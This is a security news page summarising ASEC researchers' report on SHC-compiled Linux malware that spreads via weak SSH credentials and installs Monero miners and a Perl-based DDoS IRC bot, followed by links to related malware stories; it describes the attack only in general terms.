Security News > 2023 > January > New SHC-compiled Linux malware installs cryptominers, DDoS bots
A new Linux malware downloader created using SHC has been spotted in the wild, infecting systems with Monero cryptocurrency miners and DDoS IRC bots.
According to ASEC researchers, who discovered the attack, the SHC loader was uploaded to VirusTotal by Korean users, with attacks generally focused on Linux systems in the same country.
The analysts say the attacks likely rely on brute-forcing weak administrator account credentials over SSH on Linux servers.
As scripts in SHC ELF executables are encoded using the RC4 algorithm, the malicious commands are not as easily seen by the security software, potentially allowing the malware to evade detection.
When the SHC malware downloader is executed, it will fetch multiple other malware payloads and install them on the device.
The second payload retrieved, dropped, and loaded by the SHC malware downloader is a Pearl-based DDoS IRC bot.
News URL
Related news
- New Perfctl Malware Targets Linux Servers for Cryptocurrency Mining and Proxyjacking (source)
- Linux malware “perfctl” behind years-long cryptomining campaign (source)
- Linux systems targeted with stealthy “Perfctl” cryptomining malware (source)
- New FASTCash malware Linux variant helps steal money from ATMs (source)
- New Linux Variant of FASTCash Malware Targets Payment Switches in ATM Heists (source)
- New CRON#TRAP Malware Infects Windows by Hiding in Linux VM to Evade Antivirus (source)
- Chinese hackers target Linux with new WolfsBane malware (source)